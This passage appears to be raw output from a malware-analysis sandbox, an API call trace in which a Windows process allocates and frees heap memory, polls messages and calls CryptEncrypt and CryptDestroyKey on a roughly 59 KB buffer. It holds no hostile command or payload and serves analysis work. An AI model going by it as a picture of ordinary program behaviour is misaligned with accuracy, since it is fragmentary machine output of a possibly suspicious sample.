lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0158.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0158.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0f0 | out: hHeap=0x8a0000) returned 1 [0158.342] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xe652, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xe660) returned 1 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0158.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0158.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0158.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0158.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0158.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0158.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0158.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0158.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0158.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0158.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0158.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0158.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0158.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0158.347] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0158.347] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0158.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0158.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0158.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0158.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0158.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0158.348] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0158.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0158.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0158.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0158.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.349] CharLowerBuffW (in: lpsz="byte[58977]", cchLength=0xb | out: lpsz="byte[58977]") returned 0xb [0158.349] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.352] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.352] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.352] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.352] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.352] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa104b0*, pdwDataLen=0x87e820*=0xe652, dwBufLen=0xe660 | out: pbData=0xa104b0*, pdwDataLen=0x87e820*=0xe660) returned 1 [0158.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.353] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.354] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.354] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.354] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.354] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.354] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.354] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.354] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0158.354] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.354] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.354] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.357] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.357] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.357] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.362] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.362] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.362] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0158.362] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.362] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.362] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0158.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.362] CryptDestroyKey (hKey=0x90af98) returned 1 [0158.364] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.364] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.364] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.364] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.364] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.364] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0158.364] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0158.365] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.365] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0158.365] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.365] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0158.365] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.365] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0158.365] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.365] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0158.365] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0158.365] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.365] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0158.365] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.365] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0158.366] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.366] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.366] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, 